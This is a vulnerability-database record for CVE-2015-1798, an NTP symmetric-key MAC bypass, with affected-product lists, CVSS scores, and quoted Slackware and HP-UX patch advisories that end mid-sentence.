iQIcBAEBCAAGBQJVksFmAAoJEBcWfLTuOo7tV1AQAIYpkOMpHp181b+70sgyZ/Ue mFM527FFGDfLLuIW6LTcBsEFe9cfZxumB8eOFPirTNRK7krsVMo1W+faHXyWOnx7 kbWylHdhaoxnX+A6Gj0vP71V6TNNsTi9+2dmdmHUnwxZ7Ws5QCNKebumUG3MMXXo EKxE5SNSNKyMSSYmliS26cdl8fWrmg9qTxiZQnxjOCrg/CNAolgVIRRfdMUL7i4w aGAyrlJXOxFOuNkqdHX2luccuHFV7aW/dIXQ4MyjiRNl/bWrBQmQlneLLpPdFZlH cMfGa2/baaNaCbU/GqhNKbO4fKYVaqQWzfUrtqX0+bRv2wmOq33ARy9KE23bYTvL U4E9x9z87LsLXGAdjUi6MDe5g87DcmwIEigfF6/EHbDYa/2VvSdIa74XRv/JCN1+ aftHLotin76h4qV/dCAPf5J/Fr/1KFCM0IphhG7p+7fVTfyy7YDXNBiKCEZzLf8U TUWLUCgQhobtakqwzQJ5qyF8u63xzVXj8oeTOw6iiY/BLlj9def5LMm/z6ZKGTyC 3c4+Sy5XvBHZoeiwdcndTVpnFbmmjZRdeqtdW/zX5mHnxXPa3lZiGoBDhHQgIg6J 1tTVtnO1JSLXVYDR6Evx1EH10Vgkt2wAGTLjljSLwtckoEqc78qMAT1G5U4nFffI +gGm5FbAxjxElgA/gbaq =KLda -----END PGP SIGNATURE-----
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201504-0361", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "ntp", "scope": "lte", "trust": 1.0, "vendor": "ntp", "version": "4.2.7p444" }, { "model": null, "scope": null, "trust": 0.8, "vendor": "arista", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "freebsd", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "ntp", "version": null }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "8.0.1.3" }, { "model": "ids/ips", "scope": "eq", "trust": 0.6, "vendor": "extremenetworks", "version": "8.3.0.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.6, "vendor": "freebsd", "version": "7.3" }, { "model": "linux arm", "scope": "eq", "trust": 0.6, "vendor": "debian", "version": "6.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.6, "vendor": "freebsd", "version": "9.3" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.6, "vendor": "debian", "version": "6.0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.6, "vendor": "oracle", "version": "6.2" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "2.3.0" }, { "model": "extremexos", "scope": "eq", "trust": 0.6, "vendor": "extremenetworks", "version": "15.7" }, { "model": "purview", "scope": "ne", "trust": 0.6, "vendor": "extremenetworks", "version": "6.3.0.182" }, { "model": "mac os", "scope": "eq", "trust": 0.6, "vendor": "apple", "version": "x10.10" }, { "model": "mac os", "scope": "eq", "trust": 0.6, "vendor": "apple", "version": "x10.10.3" }, { "model": "extremexos", "scope": "ne", "trust": 0.6, "vendor": "extremenetworks", "version": "15.6.4" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "3.1.0.4" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "2.4.0.3" }, { "model": "extremexos", "scope": "eq", "trust": 0.6, "vendor": "extremenetworks", "version": "15.4.1.0" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "linux", "scope": "eq", "trust": 0.6, "vendor": "slackware", "version": "14.0" }, { "model": "mac os", "scope": "eq", "trust": 0.6, "vendor": "apple", "version": "x10.10.1" }, { "model": "extremexos", "scope": "ne", "trust": 0.6, "vendor": "extremenetworks", "version": "16.1.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.6, "vendor": "freebsd", "version": "10.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.6, "vendor": "freebsd", "version": "9.2" }, { "model": "ids/ips", "scope": "ne", "trust": 0.6, "vendor": "extremenetworks", "version": "8.3.0.350" }, { "model": "ios xr software", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "mac os", "scope": "ne", "trust": 0.6, "vendor": "apple", "version": "x10.10.4" }, { "model": "extremexos", "scope": "eq", "trust": 0.6, "vendor": "extremenetworks", "version": "21.1" }, { "model": "linux sparc", "scope": "eq", "trust": 0.6, "vendor": "debian", "version": "6.0" }, { "model": "mac os", "scope": "eq", "trust": 0.6, "vendor": "apple", "version": "x10.9.5" }, { "model": "network convergence system series routers", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "60005.0.1" }, { "model": "extremexos", "scope": "eq", "trust": 0.6, "vendor": "extremenetworks", "version": "16.2" }, { "model": "unified computing system central software", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "1.0" }, { "model": "linux", "scope": "eq", "trust": 0.6, "vendor": "slackware", "version": "13.1" }, { "model": "network convergence system series routers", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "60005.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.6, "vendor": "freebsd", "version": "8.3" }, { "model": "nac", "scope": "ne", "trust": 0.6, "vendor": "extremenetworks", "version": "6.3.0.182" }, { "model": "automation stratix", "scope": "ne", "trust": 0.6, "vendor": "rockwell", "version": "590015.6.3" }, { "model": "freebsd", "scope": "eq", "trust": 0.6, "vendor": "freebsd", "version": "8.0" }, { "model": "network time protocol", "scope": "eq", "trust": 0.6, "vendor": "meinberg", "version": "4.2.6" }, { "model": "linux", "scope": "eq", "trust": 0.6, "vendor": "slackware", "version": "13.0" }, { "model": "netsight", "scope": "eq", "trust": 0.6, "vendor": "extremenetworks", "version": "6.3.0.0" }, { "model": "identifi wireless", "scope": "eq", "trust": 0.6, "vendor": "extremenetworks", "version": "10.11" }, { "model": "network time protocol", "scope": "eq", "trust": 0.6, "vendor": "meinberg", "version": "4.2.7" }, { "model": "security network protection", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "5.3" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.6, "vendor": "oracle", "version": "6" }, { "model": "network time protocol", "scope": "eq", "trust": 0.6, "vendor": "meinberg", "version": "4.2.8" }, { "model": "extremexos", "scope": "ne", "trust": 0.6, "vendor": "extremenetworks", "version": "21.1.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.6, "vendor": "freebsd", "version": "7.4" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.6, "vendor": "oracle", "version": "7" }, { "model": "linux lts", "scope": "eq", "trust": 0.6, "vendor": "ubuntu", "version": "14.04" }, { "model": "mac os", "scope": "eq", "trust": 0.6, "vendor": "apple", "version": "x10.8.5" }, { "model": "linux", "scope": null, "trust": 0.6, "vendor": "gentoo", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.6, "vendor": "freebsd", "version": "9.0" }, { "model": "automation stratix", "scope": "eq", "trust": 0.6, "vendor": "rockwell", "version": "59000" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.6, "vendor": "ubuntu", "version": "12.04" }, { "model": "linux amd64", "scope": "eq", "trust": 0.6, "vendor": "debian", "version": "6.0" }, { "model": "purview", "scope": "eq", "trust": 0.6, "vendor": "extremenetworks", "version": "6.3.0.0" }, { "model": "mac os", "scope": "eq", "trust": 0.6, "vendor": "apple", "version": "x10.10.2" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "8.0.1.2" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "2.3.0.3" }, { "model": "extremexos", "scope": "ne", "trust": 0.6, "vendor": "extremenetworks", "version": "16.2.1" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "2.4.0" }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.6, "vendor": "ubuntu", "version": "12.04" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.6, "vendor": "debian", "version": "6.0" }, { "model": "linux", "scope": "eq", "trust": 0.6, "vendor": "slackware", "version": "13.37" }, { "model": "linux mips", "scope": "eq", "trust": 0.6, "vendor": "debian", "version": "6.0" }, { "model": "linux", "scope": "eq", "trust": 0.6, "vendor": "ubuntu", "version": "14.10" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "3.2" }, { "model": "summit wm3000 series", "scope": "eq", "trust": 0.6, "vendor": "extremenetworks", "version": "0" }, { "model": "linux", "scope": "eq", "trust": 0.6, "vendor": "oracle", "version": "0" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "2.2" }, { "model": "linux", "scope": "eq", "trust": 0.6, "vendor": "slackware", "version": "14.1" }, { "model": "hp-ux b.11.31", "scope": null, "trust": 0.6, "vendor": "hp", "version": null }, { "model": "linux s/390", "scope": "eq", "trust": 0.6, "vendor": "debian", "version": "6.0" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "3.2.0.4" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.6, "vendor": "debian", "version": "6.0" }, { "model": "smartcloud provisioning for software virtual appliance", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "2.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.6, "vendor": "freebsd", "version": "8.2" }, { "model": "nac", "scope": "eq", "trust": 0.6, "vendor": "extremenetworks", "version": "6.3.0.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.6, "vendor": "freebsd", "version": "8.1" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "3.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.6, "vendor": "freebsd", "version": "8.4" }, { "model": "identifi wireless", "scope": "ne", "trust": 0.6, "vendor": "extremenetworks", "version": "10.11.1" }, { "model": "extremexos", "scope": "ne", "trust": 0.6, "vendor": "extremenetworks", "version": "15.7.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.6, "vendor": "freebsd", "version": "9.1" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "2.2.0.3" }, { "model": "security network protection", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "5.2.0" }, { "model": "unified computing system central software", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "1.1" }, { "model": "netsight", "scope": "ne", "trust": 0.6, "vendor": "extremenetworks", "version": "6.3.0.182" }, { "model": "freebsd", "scope": "eq", "trust": 0.6, "vendor": "freebsd", "version": "10.1" }, { "model": "ntp", "scope": "eq", "trust": 0.6, "vendor": "ntp", "version": "4.2.7p444" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.1.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.4" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "56003" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.16" }, { "model": "puredata system for operational analytics", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.50" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.4.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.7.16" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.8" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.16" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.4" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.8" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.6" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.5" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "56002" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.7" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "76000" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.75" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.3" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.4.0" }, { "model": "puredata system for operational analytics", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "56001" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.9.5" }, { "model": "security access manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.8.15" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "77100" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.4" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "77000" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.68" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.9.6" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.3.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.6" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "meinberg", "version": "0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.15" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.8.7" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.6" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.8.6" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.20" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.9" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.9" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.4.0" }, { "model": "network time protocol 4.2.7p10", "scope": null, "trust": 0.3, "vendor": "meinberg", "version": null }, { "model": "network time protocol 4.2.5p99", "scope": null, "trust": 0.3, "vendor": "meinberg", "version": null }, { "model": "network time protocol 4.2.7p11", "scope": null, "trust": 0.3, "vendor": "meinberg", "version": null }, { "model": "network time protocol 4.2.6p2", "scope": null, "trust": 0.3, "vendor": "meinberg", "version": null }, { "model": "network time protocol 4.2.6p3", "scope": null, "trust": 0.3, "vendor": "meinberg", "version": null }, { "model": "network time protocol 4.2.8p1", "scope": null, "trust": 0.3, "vendor": "meinberg", "version": null }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "network time protocol 4.2.6p5", "scope": null, "trust": 0.3, "vendor": "meinberg", "version": null }, { "model": "network time protocol 4.2.6p1", "scope": null, "trust": 0.3, "vendor": "meinberg", "version": null }, { "model": "network time protocol 4.2.7p230", "scope": null, "trust": 0.3, "vendor": "meinberg", "version": null } ], "sources": [ { "db": "CERT/CC", "id": "VU#374268" }, { "db": "BID", "id": "73950" }, { "db": "BID", "id": "73951" }, { "db": "CNNVD", "id": "CNNVD-201504-094" }, { "db": "NVD", "id": "CVE-2015-1798" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:ntp:ntp:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "4.2.7p444", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2015-1798" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Miroslav Lichv\u0026amp;amp;amp;amp;amp;aacute;r of Red Hat", "sources": [ { "db": "BID", "id": "73950" } ], "trust": 0.3 }, "cve": "CVE-2015-1798", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "HIGH", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 1.8, "confidentialityImpact": "NONE", "exploitabilityScore": 3.2, "impactScore": 2.9, "integrityImpact": "PARTIAL", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "LOW", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:A/AC:H/Au:N/C:N/I:P/A:N", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "HIGH", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE", "author": "VULMON", "availabilityImpact": "NONE", "baseScore": 1.8, "confidentialityImpact": "NONE", "exploitabilityScore": 3.2, "id": "CVE-2015-1798", "impactScore": 2.9, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "LOW", "trust": 0.1, "userInteractionRequired": null, "vectorString": "AV:A/AC:H/Au:N/C:N/I:P/A:N", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2015-1798", "trust": 1.0, "value": "LOW" }, { "author": "CNNVD", "id": "CNNVD-201504-094", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2015-1798", "trust": 0.1, "value": "LOW" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-1798" }, { "db": "CNNVD", "id": "CNNVD-201504-094" }, { "db": "NVD", "id": "CVE-2015-1798" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The symmetric-key feature in the receive function in ntp_proto.c in ntpd in NTP 4.x before 4.2.8p2 requires a correct MAC only if the MAC field has a nonzero length, which makes it easier for man-in-the-middle attackers to spoof packets by omitting the MAC. NTP Project ntpd reference implementation accepts unauthenticated packets with symmetric key cryptography and does not protect symmetric associations against denial of service attacks. \nSuccessful exploits may allow the attacker to cause a denial-of-service condition. NTP is prone to a security-bypass vulnerability. \nSuccessfully exploiting this issue may allow attackers to obtain sensitive information by conducting a man-in-the-middle attack. This may lead to other attacks. \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/ntp-4.2.8p2-i486-1_slack14.1.txz: Upgraded. \n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1798\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1799\n (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/ntp-4.2.8p2-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/ntp-4.2.8p2-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/ntp-4.2.8p2-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/ntp-4.2.8p2-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/ntp-4.2.8p2-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/ntp-4.2.8p2-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8p2-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8p2-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8p2-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8p2-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8p2-i486-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8p2-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 13.0 package:\n570bb3e4bb7b065101fa4963e757d7e7 ntp-4.2.8p2-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\ne6add42a70a66496be2d4978370c2799 ntp-4.2.8p2-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\n99f1cfa5e23a256d840ed0a56b7f9400 ntp-4.2.8p2-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\n0a6622196521e084d36cda13fc6da824 ntp-4.2.8p2-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\n28cfe042c585cf036582ce5f0c2daadf ntp-4.2.8p2-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\nc436da55cd2d113142410a9d982c5ac5 ntp-4.2.8p2-x86_64-1_slack13.37.txz\n\nSlackware 14.0 package:\ncf69f8ecb5e4c1902dfb22d0f9685278 ntp-4.2.8p2-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n9c8344ec56d5d2335fd7370e2f9cf639 ntp-4.2.8p2-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\n9dcf0eafa851ad018f8341c2fb9307b5 ntp-4.2.8p2-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\ne0c063f4e46a72ec86012a46299a46df ntp-4.2.8p2-x86_64-1_slack14.1.txz\n\nSlackware -current package:\n5f72de16e3bb6cd216e7694a49671cee n/ntp-4.2.8p2-i486-1.txz\n\nSlackware x86_64 -current package:\n1ba531770e4a2ae6e8e7116aaa26523e n/ntp-4.2.8p2-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the package as root:\n# upgradepkg ntp-4.2.8p2-i486-1_slack14.1.txz\n\nThen, restart the NTP daemon:\n\n# sh /etc/rc.d/rc.ntpd restart\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address. \n\nRelease Date: 2015-05-19\nLast Updated: 2015-05-19\n\nPotential Security Impact: Remote Denial of Service (DoS), or other\nvulnerabilities\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified with HP-UX running\nNTP. These could be exploited remotely to create a Denial of Service (DoS),\nor other vulnerabilities. \n\nReferences:\n\nCVE-2015-1798 - Symmetric-Key feature allows MAC address spoofing (CWE-17)\nCVE-2015-1799 - Symmetric-Key feature allows denial of service 